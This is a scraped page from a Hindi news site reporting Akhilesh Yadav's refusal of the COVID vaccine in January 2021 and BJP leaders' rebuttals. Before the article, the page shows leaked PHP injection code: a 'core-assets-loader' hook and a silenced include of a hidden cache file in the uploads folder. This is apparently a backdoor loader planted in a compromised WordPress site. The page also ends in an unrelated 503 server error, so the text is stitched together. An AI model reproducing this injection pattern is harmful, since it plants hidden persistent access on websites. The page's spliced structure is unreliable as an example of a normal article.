add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अखिलेश यादव नहीं लगवाएंगे कोरोना का टीका, बोले- BJP की वैक्सीन पर नहीं है भरोसा – SOCH INDIA
Menu

देश
अखिलेश यादव नहीं लगवाएंगे कोरोना का टीका, बोले- BJP की वैक्सीन पर नहीं है भरोसा

nobanner

देश भर में कोरोना वैक्सीन को लेकर चर्चा जोरों पर है. वैक्सीनेशन के लिए केंद्र सरकार ने आज यानी 2 जनवरी 2021 से देश के हर राज्य में कोरोना वैक्सीन का ड्राई रन (Dry Run) का फैसला किया है. लेकिन इस बीच समाजवादी पार्टी (सपा) के मुखिया और पूर्व सीएम अखिलेश यादव का बड़ा बयान सामने आया है. उन्होंने कहा है कि वो कोरोना की वैक्सीन नहीं लगवायेंगे. अखिलेश ने कहा, ‘मुझे बीजेपी की वैक्सीन पर भरोसा नहीं है.’ वहीं उनके इस बयान पर बीजेपी नेताओं ने कड़ी प्रतिक्रिया दी.

केंद्रीय मंत्री अनुराग ठाकुर ने साधा निशाना  

सपा मुखिया के बयान पर केंद्रीय मंत्री अनुराग ठाकुर ने निशाना साधा. उन्होंने कहा कि “पीएम मोदी ने जान है तो जहान है की बात कही है. कोरोना वैक्सीन के लिए दुनिया भर के वैज्ञानिकों ने रात दिन इसलिए एक करा कि कम से कम जानें जाएं. अखिलेश यादव अपनी डूबती राजनीति बचाने के लिए दुर्भाग्यपूर्ण बयानबाज़ी कर रहे हैं.”

अखिलेश के बयान पर केशव मौर्य का पलटवार

अखिलेश यादव के कोरोना वैक्सीन नहीं लगवाने वाले बयान पर यूपी के डिप्टी सीएम केशव मौर्य ने भी पलटवार किया. उन्होंने कहा कि अखिलेश यादव को वैक्सीन पर भरोसा नहीं और उत्तर प्रदेश वासियों को अखिलेश यादव पर भरोसा नहीं है. वैक्सीन पर सवाल उठाना वैज्ञानिकों का अपमान है, उनको इसके लिए माफ़ी मांगनी चाहिए.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.